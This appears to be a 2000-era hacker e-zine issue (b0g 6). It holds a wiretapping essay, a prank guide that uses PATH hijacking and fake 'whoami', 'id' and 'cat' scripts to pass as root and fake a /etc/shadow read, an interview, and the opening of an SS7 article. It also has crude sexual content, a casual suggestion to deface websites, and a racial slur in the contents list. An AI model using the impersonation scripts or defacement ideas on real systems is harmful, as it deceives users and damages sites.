Copy Link
Add to Bookmark
Report
b0g 06
_________________________________________
.-. _ .-. / \
| _____ | . o O| http://www.b0g.org |
( @ @ ) \________________________________________ /
\ /
\ --- /
| |
--- ---
| i i |
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
TH4 JUN3 1SSU3 1SSU3 VI ! 1N Y00R F4C3! PH33RN4T10N!
b0g b0g!# !b0 b0 #@! b0g!# #@!
b0g !b0g!#@ !b0 b0 #@ @!b0g!#@ #@!
b0g @!b0g!#@! !b0 !b0 #@ #@! #@! #@!
b0g @! @!b !#@! !b0 #@!b0g!#@!b !#@ 0 @!b #@!
b0g #@!b #@!b #@! !#@!b0g! !b0 !#@!b0g!#@!b !# b0g!#@!b #@!
b0g!#@!b0 #@!b #@! g!#@!b0g! !b0 !#@!b0g!#@!b g!# !b0g!#@ b0 #@!
b0g!#@!b0g #@!b #@! 0g!# b0g! !b0 !b !# g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g!# b0g! !b0 @!b !# g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g! b0g! !b0 @!b !# g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g! b0g! !b0 !#@!b0g!#@! g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g! b0g! !b !#@!b0g!#@! g! @!b !#@ b0 #@
b0g !b0g #@!b #@! 0g!# !b0g! @! g! g!# !b0g!#@!b0
b0g!#@!b #@!b0g!#@! g!#@!b0g! !b0 #@! g! !# !b0g!#@!b #@!
b0g!#@!b @!b0g!#@ g!#@!b0g! !b0 #@! 0g! !#@ b0 !#@!b #@!
0g!#@! !b0g!# !#@ b0g! !b0 #@ 0g #@! #@!
b0g! !b0g!#@!
g!#@!b0g b0g!#@
g!#@!b0
g!#@!b
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ Table of Content! [b0g-6.txt]
[ 0:. - [ ] :. ]
[ 1:. - [ A Look Into Wiretapping ] [psyops] :. ]
[ 2:. - [ getting root; the b0g way ] [timidu] :. ]
[ 3:. - [ Hacking Your Way into a Girlie's Heart ] [ch1ckie] :. ]
[ 4:. - [ Guide to Mostly Harmless Masturbating ] [tiller] :. ]
[ 5:. - [ interview with cr0bar ] [wh0rde] :. ]
[ 6:. - [ The SS7 Signaling Connection Control Part Relay System ]
(gee, couldn't come up with a longer title?) [theclone] :. ]
[ 7:. - [ old Ladie Panty Box ] [PhluX And Pooly] :. ]
[ 8:. - [ mailbag ] [k-rad-bob] :. ]
[ 9:. - [ How to hack the planet ] [wh0rde] :. ]
[10:. - [ Sniffing and spoofing explained ] [psyops] :. ]
[11:. - [ Teenage Mutant Nigger Turtles part 2] [chris] :. ]
[12:. - [ hacking for cybersex ] [nathan] :. ]
[13:. - [ How to NOT get owned by Prae ] [timidu] :. ]
[14:. - [ The disk trick ] [shadowwolf] :. ]
[15:. - [ How to crack macromedia products ] [anonymous] :. ]
[16:. - [ hax0r trick ] [timidu] :. ]
[17:. - [ Fun with noise in QBASIC ] [niemand1] :. ]
[18:. - [ pulling people's doc's on irc ] [wh0rde] :. ]
[19:. - [ IRC Quotes ] [k-rad-bob] :. ]
[20:. - [ Closing words ] [k-rad-bob] :. ]
[ ]
____________________________________________________________________
get your b0g at: http://www.b0g.org - official site!
http://packetstorm.securify.com/mag/b0g/
send your submissions to b0g@b0g.org !
gibb0r us your articles!
send us anything >:/
____________________________________________________________________
[ 1:. - [ A Look Into Wiretapping ] [psyops] :. ]
[psyops@phault.org] :. ]
____________________________________________________________________
Wiretapping is the traditional term for interception of telephone
conversations. This should not be taken too literally. The word is no
longer restricted to communications traveling by wire, and
contemporary wiretaps are more commonly placed on radio links or
inside telephone offices.
The meaning has also broadened in that the thing being tapped need no
longer be a telephone call in the classic sense; it may be some other
form of electronic communication, such as fax or data.
Compared with the more precise but more general phrase
"communications interception," the word "wiretapping" has two
connotations.
Much the stronger of these is that a wiretap is aimed at a particular
target, in sharp contrast to the "vacuum cleaner" interception widely
practiced by national intelligence agencies. The weaker connotation is
that it is being done by the police.
The history of wiretapping in the United States is in fact two
histories intertwined. It is a history of wiretapping per se--that is,
a history of the installation and use of wiretaps by police,
intelligence agencies, honest citizens, businesses, and criminals. It
is also a history of society's legal response to wiretapping by these
various groups.
The origins of wiretapping lie in two quiet different practices:
eaves dropping and letter opening. "Eavesdropping," although once more
restricted in meaning, has come to describe any attempt to overhear
conversations without the knowledge of the participants. "Letter
opening" takes in all acquisition, opening reading, and copying of
written messages, also without knowledge of the sending and receiving
parties. Telecommunication has unified and systematized these
practices.
Before the electronic era, a conversation could only be carried on
by people located within earshot of each other, typically a few feet
apart.
Neither advanced planning nor great effort on the part of the
participants was required to ensure a high degree of security. Written
communications were more vulnerable, but intercepting one was still a
hit-or-miss affair. Messages traveled by a variety of postal services,
couriers, travelers, and merchants. Politically sensitive messages, in
particular, could not be counted on to go by predictable channels, so
special couriers were sometimes employed.
And written messages enjoyed another sort of protection. Regardless
of a spy's skill with flaps and seals, there was no guarantee that, if
a letter was intercepted, opened, and read, the victim would not
notice the intrusion.
Since spying typically has to be done covertly in order to succeed,
the chance of detection is a substantial deterrent.
Electronic communication has changed all this in three fundamental
ways: it has made telecommunication too convenient to avoid; it has,
despite appearances, reduced the diversity of channels by which
written messages once traveled; and it has made the act of
interception invisible to the target.
Conversation by telephone has achieved an almost equal footing with
face-to-face conversation. It is impossible today to run a successful
business without the telephone, and eccentric even to attempt to do
without the telephone in private life. The telephone provides a means
of communication so effective and convenient that even people who are
aware of the danger of being overheard routinely put aside their
caution and use it to convey sensitive information.
As the number of channels of communication has increased (there are
now hundreds of communication companies, with myriad fibers,
satellites, and microwave links), the diversity of communication paths
has diminished. In the days of oxcart and sail, there was no registry
of the thousands of people willing to carry a message in return for a
tip from the recipient. Today, telecommunications carriers must be
registered with national and local regulatory bodies and are well
known to trace associations and industry watch groups. Thus,
interception has become more systematic. Spies, no longer faced with a
patchwork of ad hoc couriers, know better where to look for what they
seek.
Perhaps more important, interception of telecommunications leaves no
telltale "marks on the envelop." It is inherent in telecommunication--
and inseparable from its virtues--that the sender and the receiver of
a message have no way of telling who else may have recorded a copy.
Any discussion of wiretapping, particularly a legal discussion, is
complicated by the fact that electronics has not only made
interception of telecommunications possible; it has also made it
easier to "bug" face-to-face conversations. Bugging would be nearly
irrelevant to the central subject of this document--Taking A Deeper
Trip Into Wiretapping--were it not for the fact that bugs and wiretaps
are inseparably intertwined in law and jurisprudence and named by one
collective term: electronic surveillance.
Wiretaps and bugs are powerful investigative tools. They allow the
eavesdropper to overhear conversations between politicians, criminals,
lawyers, or lovers without the targets' knowing that their words are
being share with unwanted listeners. Electronic surveillance is a tool
that can detect criminal conspiracies and provide prosecutors with
strong evidence--the conspirators' incriminating statements in their
own voices--all without danger to law-enforcement officers. On the
other hand, the very invisibility on which electronic surveillance
depends for its effectiveness makes it evasive of oversight and
readily adaptable to malign uses.
Electronic surveillance can be and has been used by those in power to
undermine the democratic process by spying on their political
opponents.
In light of this, it is not surprising that Congress and the courts
have approached wiretapping and bugging with suspicion.
Today, communication enjoys a measure of protection under US law,
and neither government agents nor private citizens are permitted to
wiretap at will. This has not always been the case. The current view
that wiretaps are a kind of search--has evolved by fits and starts
over a century and a half. The Supreme Court ruled in 1967 that the
police may not employ wiretaps without court authorization. Congress
has embraced this principle, limiting police use of wiretaps and
setting standards for the granting of warrants. The same laws prohibit
most wiretapping by private citizens.
The rules against unwarranted wiretapping are not absolute, however.
For example, the courts ruled in 1992 (United States vs. David Lee
Smith, 978 F. 2nd 171, US App) that conversations over cordless phones
were not protected and that police tapping of cordless phones did not
require a search warrant. A 1994 statute (Communications Assistance
for Law Enforcement Act of 1994, Public Law 103-414, §202) extended
the warrant requirements of the earlier law to cover cordless phones.
The law also makes some exceptions for businesses intercepting the
communications of their own employees on company property.
Feedback would be nice <psyops@phault.org>.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 2:. - [ getting root; the b0g way ] [timidu] :. ]
[timidu@b0g.org] :. ]
____________________________________________________________________
BASH is fucking vulnerable .. every version of it .. the newest
exploit posted here cuz BugTraq sucks (just kidding , /me is too lame
to publish an exploit :// )
So kidz , wanna impress some class-mate chix0r wit y3r 31337 h4x1ng
skee1z?
Wanna show her what rewt means , still you can't hack the school
computer that's running Linux?
Well , check THIS new exploit out ( actually it's not an exploit , but
I think a script-kiddie will love it)
You only need a fucking valid account there , bash and ... oh , 2
brain cells.
Log at your shell and follow the next 6 basic steps:
1) Issue this :
$ echo "PS1='[root@\h /root]#'" >> .bash_profile
$ echo "PATH=$HOME/bin:$PATH" >> .bash_profile
Done? Not yet? Uhm .. man , don't fucking write the "$" . That's your
prompt :/ . Boy , are you dum....
2) Make a directory in your home directory.Call it bin .
First change to the home directory:
$ cd
Next , do it:
$ mkdir bin
And cd to it:
$ cd bin
3) Make 2 files using a text editor.Let's say we're using pico. The
philez name SHOULD and MUST be 'whoami' and 'id'
$ pico whoami
--cut here--
#!/bin/bash
# the whoami thingie
echo root
--stop cutting--
$ pico id
--cut here--
#!/bin/bash
# the id thingiez
echo "uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)"
--stop cutting--
4) Make them executable philes. Oh , you don't know what that means ..
and yet you want root. God thank me for not letting you have the
fucking real admin rights there. So .. do this in the directory where
'id' and 'whoami' are stored (~/bin)
$ chmod +x whoami
$ chmod +x id
5) Change ,thru .bash_profile , some of the shell variables : LOGNAME
or USER ( some of the variables are read-only and i'll treat this
subject l8r)
$ echo "LOGNAME=root" >> ~/.bash_profile
$ echo "USER=root" >> ~/.bash_profile
6) Now logout and login. If you did what i've just told you you should
have a prompt similar to root's one. Oh ,and when you write whoami and
id it should tell that you're root. Simple , eh?
Let's say that you want to go further.There are plenty of thingz to be
done and i'll cover some of them in the second part of this
"shitlist".
I just hope that you can actually find a chick that likes leet hackers
like you. You'll just end up showing this to some weird nerd that'll
truly admire you and wink at you , and act really strange and ask you
out :\.
So .. you learned how to fake your identity on a Linux machine thru 6
steps. But , heh, what if the guy you're trying to trick is smart and
he puts you to do thingz that only root can?
What can root do and a normal user can't? See below for a few neat
tricks
*** printing /etc/shadow's content ***
For this trick you need a shadow file. You can take it from your own
box (actually that's dumb if it's found out).Upload this shadow file
into the
fake-root Linux account in the ~/bin folder ( ~ means your home dir ,
you gimp!) .
Now we have to do a new k3w1 m4d r33t script. Let's fake the `cat`
command cause that's the way you view the damn /etc/shadow file.
So ..
$ cd ~/bin
Ooops .. i forgot that you just used PS1 to fake the prompt =]. I
actually
ment '# cd ~/bin' :PPPP
# cd ~/bin
# pico cat
Now paste this eleet script
--- start cutting ---
#!/bin/bash
found=0
y='/bin/cat '
for x in $*
do
if [ $x != '/etc/shadow' ]
then
y=$y' '$x
else
found=1
fi
done
if [ $found = 1 ]
then
$y $HOME/bin/shadow
else
/bin/cat $*
fi
--- stop cutting ---
Now cat will print YOUR shadow file if you issue a `cat /etc/shadow`
and will just act normally in any other cases. You probably say :
"geez , what a lame script , i could have done it in 3 rows". Hey
motherfucker , wake up from your dreaming. Maybe your pals are
actually smarter than you.
I was safe to make my script keep the switches for example. So , if
you do a `cat -E -n /etc/shadow` or a `cat -n /etc/shadow -E` it'll
still work just fine.
Next , `chmod +x cat` so you can actually use it .. and that's it.
Have fun!
*** mounting a file system ***
Heh , i know whatcha gonna say : "mount ain't that important!!". But
goddammit , when you're not root and you can't mount a file system and
yet you try to mount it , the shell gives you that nasty output :
"only root can do that" .
Just enter you good old bin directory and make a 'mount' file.Since
you can't really fake a mounting , at least let's get rid of that
"only root.." error.
For example :
--- cut here ---
#!/bin/bash
# This iz the phile that fakes mounting.
# Name it mount and put it in ~/bin
# Don't forget to chmod it so you can run it
if [ $# = 0 ]
then
/bin/mount
exit
fi
if [ "$1" = "-V" ]
then
/bin/mount -V
elif [ "$1" = "-h" ]
then
/bin/mount -h
else
echo "only root CAN'T do that"
fi
--- stop it , man ---
Heh , lame phile and you should change that stupid "only root CAN'T do
that" thing to one of your own or something that appears more often.
There are plenty of other thingz that can be done with this PATH
trick.
For those silly newbies that don't know even the basics , if i set
PATH=my_directory:/bin:/usr/bin then the shell will first look in
my_directory to find a command/file.
Now , if you're careful enough , you can leave the impression that
you're really root on that system. Still , there are things where you
can be catched as a liar ://. For example
[root@somelamebox ~]# cd /root
bash: /root: Permission denied
[root@somelamebox ~]#
Doesn't exactly look like a root account ,eh? :/ .It's not too easy to
fake the cd command as it is an internal function of bash. You can
still set your prompt to something like PS1='[root@\h /root]# '. Other
TODO thingz are :
- faking ls not to show the content of the /home/$USER/bin
- killing and starting some processes
- uhm .. i dunno, but if bob publishes this (although i don't see a
good reason that he does it) i'll continue this with more eleet ideas
;]
I'm sorry for my bad english and for some mistakes that i made (
redirect flames to /dev/null ) but i had to write it in a very short
time.
I am TOTALLY responsible for the harm that you may cause with the
ideas/scripts posted here =]
And to quote Phuck(that's the real name of Phrack) i may say that this
is for and by the lamers community >:>
Happy faking!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 3:. - [ Hacking Your Way into a Girlie's Heart ] [ch1ckie] :. ]
[ch1ckie@hotmail.com] :. ]
____________________________________________________________________
->Lesson One: Making Yourself Appear More Elite Than You Actually Are.
-In real life, or on IRC, the most important thing that a girlie looks for
in a hax0r is skill (she hopes it will move her up in the world), whether it is
real skill (which is hard to come by these days) or if its simply an elite host
(hax0r@fbi.gov).
-To make yourself appear more elite than you actually are (or ever will
be), the first step is getting yourself an elite host (2845818@shellyeah.org
probably won't cut it), either by means of a shell, wingate, or bnc (and if you
don't know of these things, just tell the girl you admin some big network in
your spare time and Im sure she'll be impressed).
-In all retrospect, most girlies don't know the difference between _you_
and the real thing, so don't worry.
-Opposing popular use...to the majority of girlies, it is best not to use
leet speak (eye 4m 4 m45t0r hax0r); this will more often than not end up
confusing them and leave them bewildered. Thus, trying to impress them will
prove useless. If you happen to have a girl that knows 'leet speak', don't
directly use this speak with her either, but use it when she is in the premises
("y0 m4ng, u b3tt4 ch3ck y0s3lf b4 u wr3ck y0s3lf"). This will undoubtfully
make you appear more elite/phearful than you actually are.
-For those of you who are more 'skilled', deface webpages in the fair name
of your girlie... ("U R 0wned; mad props to my girlie"). This is a concept far
beyond most girlies, and seeing their name on www.yahoo.com proves very
impressive.
A few other methods of making yourself appear elite:
-obtaining operator status in as many channels as possible, do whatever you can
to do so... suck dick, kiss ass, or stomp on some heads.
-pinging out her enemies on command will impress/delight her enough to have even
cyber sex with you... might wanna keep that in mind.
-using random 'big' words such as "heuristic control algorithm" or
"pleisiochronous communications" will be sure to impress... they do not even
have to be in an order that makes any sense. As long as your girlie hears 'big
important words', she will believe that you are elite...and the sad part is,
that you will probably believe that you are too :(.
*Making yourself appear more elite than you actually are, is the first step to
hacking your way into a girlie's heart. Lesson two and three coming soon
('Making Your Girlie Feel Important', and 'Understanding Your Girlie').*
[Shouts to my 'elite' gang in ftg ....Debris, nerp, potus, omega44, JimJones,
and all the rest.]
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 4:. - [ Guide to Mostly Harmless Masturbating ] [tiller] :. ]
[tiller@digitalhackers.com] :. ]
____________________________________________________________________
I'm writing this for you today to illustrate the importance of good
masturbation. Philosophy wise, masturbation has the ability to lessen teen
pregnancy. Others believe it's a sin due to the explicit nature of thoughts as
you masturbate. But today we will demonstrate the different aspects of enjoying
those thoughts.
First hand position: The "Fist"
The fist is widely used, and popular amongst the teenage individuals. The fist
method is the base for many other methods, like the "rocker," or the "double
fisted willy choker." The key to good fist action is in the wrists. Many young
individuals, not very experienced like myself, use their upper arm and run short
of breath by the time of ejaculation. Another trick to good fist action is a
tight grip. Don't grab too tight, otherwise it starts to hurt, but a
comfortable grip will do. This is where the "double fisted willy choker" is
useful. The double fisted willy choker uses two hands, one hand grips penis,
and the other wraps around securing the grip. This allows the masturbator to
relax his main hand, and still keep a tight grip. Using the double fisted willy
choker, you can go into a transition into the "rocker." The rocker is very
useful for those short of breath. To do the rocker, stand up, start off with
the double fisted willy choker, and then jump up and down relaxing your arms,
allowing the weight of your arms to do the masturbating for you.
The Second hand position: The "Simulated Camel Toe"
The simulated camel toe is not widely used, due to it's complexity, and
requirement for flexibility. This method is done by placing both index fingers
together, and both thumbs together. Now make the hole as large as needed. Some
prefer tight, but as you've noticed, making a small hole requires too much
flexibility, which is uncomfortable. The simulated camel toe can then alter to
perform the "sandwich." The sandwich again requires two hands; fortunately
flexibility is not a problem. To perform the sandwich, it's like clapping your
hands, except in this case, there's something in the middle.
The Third hand position: "Fakie"
Fakie is the "fist" method, in reverse. By this I mean your thumb and
forefinger should be facing down. The fakie is useful in the sense, that some
people get arm cramps. This method uses different arm muscles, allowing pain
free masturbation.
The Forth position: "Couch Crack"
This is not exactly a hand position, but famous non the less. The couch crack
utilizes the crack between the cushions of your couch. To execute this method,
just stick it between the crack, and start humping.
Brown Finger Fist Action
The following position gives you that little more satisfaction. To get the best
out of this position i recommend that you are on a bed, couch, and you have a
pair of gloves (i prefer a clear kind) Firstly you need to slap your penis
around to get it hard. Once your penis is hard you must gently tug on your penis
for about 10-15 seconds, now you place your left index finger (if your right
handed) into your anus. Slide your finger in and out gently while u continue to
tug on your penis gently. After about 30 seconds the average person will reach
there climax and blow there load. I like to describe this as the most satisfying
masturbation known to man. *warning* using moms cleaning gloves is never a good
idea.
Newbie note: Doing any methods mentioned above, while spectators witness such
an act of stupidity, will get you in the front page of your local newspaper.
You could go to jail warning: And yes, they will charge you for indecent
exposure. I recommend you think before you act, otherwise, you'll be sharing a
jail cell with some guy named Spike, who doesn't have to masturbate, he's got
you to bend over for him now.
There is more to masturbating than just different ways of doing it. There is
the element of 'where' you do it. The excitement of the different places of
masturbating is overwhelmed by the many different public locations in your area.
Location Number One: Your Bed
Your bed is the most basic location of masturbation. The only difficulties that
you may encounter are that the bedsprings can be loud. Instead of on your bed,
I suggest you masturbate on the floor. This will eliminate the sound of
bedsprings, allowing you to stay stealth.
Location Number Two: The Parent's Bed
This could be difficult to manage, although the experience is always something
to tell your kids (or maybe not, unless you want them to masturbate on your
bed). Of course you would do this while they are gone, so stealth is not
necessary.
Location Number Three: The Closet
The closet is always nice for the daytime urges, which may overcome your self-
discipline. If you have to masturbate during daylight hours, the closet allows
hiding from any neighbors that might see you otherwise through the window.
Although the closet provides visual stealth, sound may be a predicament if your
closet walls are connected to any rooms in the house.
Location Number Four: Pools/Hot Tubs/Lakes
These three locations are a luxury. Not many individuals can masturbate in a
pool, but if you ever have a chance to, it's the greatest. Just make sure no
one sees you doing this, other wise, this could prove to be very embarrassing.
Location Number Five: The Shower
The shower is the next best thing to a pool, hot tub, or a lake. The shower
provides the soothing hydro pulsating massage therapy, while your masturbating
to the chick you saw last night. The great part of "showerbating" is the fact
that any noise you make will be drowned out by the water. "Bathbating" on the
other hand is great and all, but stealth is a requirement.
Experiment with the many locations in your area.
In conclusion, we have discovered the many ways of self-pleasure. We have also
established the fact that whom ever thinks it's a sin to masturbate, doesn't
know how fucking great it is to shoot a wad six feet in the air, and have it
land on the bulls eye on the piece of paper lying at your feet (this game might
go in my next guide).
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 5:. - [ interview with cr0bar ] [wh0rde] :. ]
[wh0rde@b0g.org] :. ]
____________________________________________________________________
b0g:
Ive been reading your parodies ever since hackers was barely
finished, and I have to ask, where do you get your elite 0-d4y movie warez?
Would you like more 0-d4y movie warez from a cable ftp? Are you open to
suggestions for parodies?
Cr0bar:
I don't know. . . .I work in the MAE-WEST NOC, and this guy on IRC told
me to set up something called "warftpd", it made all the lights on our
routers start flashing really fast, since then, all these really cool
programs and movies have been showing up on my hard drive. Seriously
though, I buy the DVD of every movie that I bastardize, The Matrix was
done using a VCD because I couldn't figure out how to do frame grabs off
the DVD. I may re-do The Matrix off the DVD now that I know how. Sort
of like the Star Wars Special Edition(s).
b0g:
You obviously have elite PrintScreen skills, how would you rate
yourself on the following scale: AOL, Prodigy, Canuck, Ping.exe,
/bin/bash/ping -f, Script kiddy, User, Root, Sysadmin, wh0rde, or Burrows.
Cr0bar:
Definetly whore. Er, it depends. Sysadmin is the highest level which I
recognize, so I guess that's me. I don't see ubergeek on your list.
b0g:
What is your favorite:
IRC Server? (Efnet, Unet..)
OS? (Linux, Fbsd, Nbsd, Solaris, Windoze..)
Text editor? (vi, pico, jove, notepad, winword (sigh)..)
Sandwich? (Subway, Sloppy Joe, Club..)
Cr0bar:
I'm partial to efnet myself, although I started on newnet (Shout-outs to
Snowcrash, dstf, and the Optics...they knew me as "bytstream") and I
only go to dalnet for hardcore porn. I use windows because you just
can't get photoshop and half-life for linux (The gimp can suck it). I
prefer linux or fbsd on my servers, because they make me look cool.
b0g:
Have you ever seen a half naked mormon from Utah write "b0g 0wnz me"
on his chest? If not, would you like to?
cr0bar:
Only if he was about to be shot.
b0g:
What are your favorite sites to visit besides b0g.org?
Cr0bar:
You mean besides my customized Yahoo! start pages????
I think I've visited b0g.org once, when someone from there was trying to
get me to link them....but to answer your question, I am a regular
reader of hardocp.com, penny-arcade.com, userfriendly.org,
arstechnica.com, theregister.co.uk, slashdot.org, and a few others that
I don't visit enough to count as "regulars".
b0g:
Do you have any boy/girl Mtv style mp3s on any of your computers?
(Titney Spears, Backdoor Boys, Off`Sync..)
Cr0bar:
Does the "Make My Boobies One More Size" parody count?
I have music that has appeared on MTV, none of the teenybopper stuff I
assume you're referring to.
b0g:
What are your feelings about Napster?
Cr0bar:
It exists for only one purpose, and that is piracy, which I can't
condone in good conscience. However, good conscience doesn't seem to
have much of a hold on most of the world, including myself, and napster
certainly has a right to exist. I have begun purchasing all the CDs for
albums which I originally had on mp3. The ones that I didn't think were
good enough to purchase, I erased. This is because I support the
artist, and I don't have room on my RAID array for shitty music.
b0g:
What are your feelings on Metallica and Dr Dre?
Cr0bar:
I really think "no" means "no", regardless of how many drinks you've
had. The least Metallica could've done was wear condoms. I hope Dre
tests negative and is able to sit and walk normally soon. Wait, what
was the question?
b0g:
If you could pick one moment in your life, besides reading issue 5 of
b0g, that you could relive (and it cant involve crisco), what would it
be?
Cr0bar:
I want to say [edited], but people I know will read this. So, I'll just
say the moment when I woke up and saw that my site had been slashdotted,
and then the next hour or so right up until the sysadmin of my server
called and yelled at me to shut it off because it was killing his
operation.
b0g:
Are you into hax0ring the planet? Do you feel the government is
trashing our rights?
Cr0bar:
Breaking into systems is no cooler than breaking into someone's car or
home, even if you don't do any damage. Sorry, but it's true. However,
"The Man" is getting us down, and needs to wise up before meddling with
our supermation infohighway.
b0g:
What is the significance behind your h4x0r handle? If you had the
opportunity to give Linus Torvalds, Big Willy Gates, and Rob Malda from
slashdot h4x0r handles, and they have to use a dash "-" somewhere, what
would they be? If you picked Pig-Fucker for Big Willy, can you explain
why?
Cr0bar:
I picked "cr0" semi-randomly a few years ago when registering for a
BBS. Then I found out that it has a few "leet" connotations, if you
will. Apparently, there is a register in some CPUs called "cr0", which
I found was sufficiently obscure to add "leetness" to my handle. About
a year after I started going by "cr0", I decided that I didn't like the
associationw with "crow", so I changed my name to "cr0bar" (Everyone's
favorite implement, for any task). To this day, people still call me
"cr0", except for Scott "Damage" Wasson of the Tech Report, who says,
"sup, 'bar?".
Linus Torvalds would have to be Trans-Meta, because I don't know what it
means or is good for, but it seems to have gotten a lot of attention.
It's hard to come up with a unique jab at Bill Gates, and I'm too tired
to think about Rob Malda intelligently, do I lose points for skipping
questions?
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 6:. - [ The SS7 Signaling Connection Control Part Relay System ]
(gee, couldn't come up with a longer title?) [theclone] :. ]
[theclone@b0g.org] :. ]
____________________________________________________________________
___ ___
The SS7 Signaling Connection Control Part Relay System
___ ___
Friday May 12, 2000
^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^
-- Research --
++ Introduction ++
++ Key Benefits of SCCP Relay ++
++ Platform & Application / Security Issue ++
++ SCCP Relay & GTT Functional Description ++
++ SCCP Relay Software Architecture ++
++ SCCP Relay Hardware Architecture ++
-- GSM Background Information --
+ Home Location Register (HLR) +
+ Visitor Location Register (VLR) +
+ International Mobile Subscriber Identity (IMSI) +
+ GSM's Mobile Station Equipment (MSE) +
-- GSM Call Routing --
+ Mobile Subscriber Roaming +
+ Mobile Subscriber ISDN Number (MSISDN) Call Routing +
+ Implementation of a second HLR to the GSM Network +
-- References --
++ Web-site Resources ++
++ Acronym Definitions ++
-- Wrap-up --
+* Conclusion *+
+* Contact *+
^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^ ^^^
Introduction --
As the number of wireless subscribers throughout Canada and the United States
continues to increase dramatically each year, wireless carriers will be facing
the challenges that rapid growth creates. One such challenge in this market
is the migration from a single Home Location Register (HLR) to a multiple HLR
topology.
The HLR, which successfully stores critical identification and
subscription information about each customer, can become a network bottleneck
either because of the sheer number of subscribers contained in the database, or
because of the number of SS7 messages arriving at the HLR. A single HLR also
poses a risk to the overall survivability of the entire wireless service under
the new SS7 protocol.
Assembling additional HLR carriers to a wireless network presents significant
and problematical challenges, however. If the existing routing algorithms are
simply expanded, then every Mobile Switching Center (MSC) and Signal Transfer
Point (STP) on the network is affected, and the routing table management becomes
extremely complicated and highly error prone.
(STPs are the packet switches of the SS7 network. They receive and route incoming
signaling messages towards the proper destination and also perform specialized
routing functions.)
Many of the challenges in multiple HLR deployment are constantly an issue,
and are constantly being worked upon. Fortunately a company by the name
of MicroLegend has developed a centralized SS7 message routing system called
the 'SCCP Relay.' The SCCP Relay supports all of the necessary GSM SS7 message
routing tables to allow wireless carriers (specifically GSM/GPRS) to easily
expand to a multiple HLR topology.
Throughout this document, I will attempt to introduce a new technology within the
new world of the Out-of-band signaling SS7 architecture -- it is here to stay
and it has taken over the world telecommunications significantly from its older
counterpart switching system known as 5ESS.
Now please, sit back and relax, and prepare to enter the world of the SS7 Signaling
Connection Control Part Relay System...
Key Benefits of SCCP Relay --
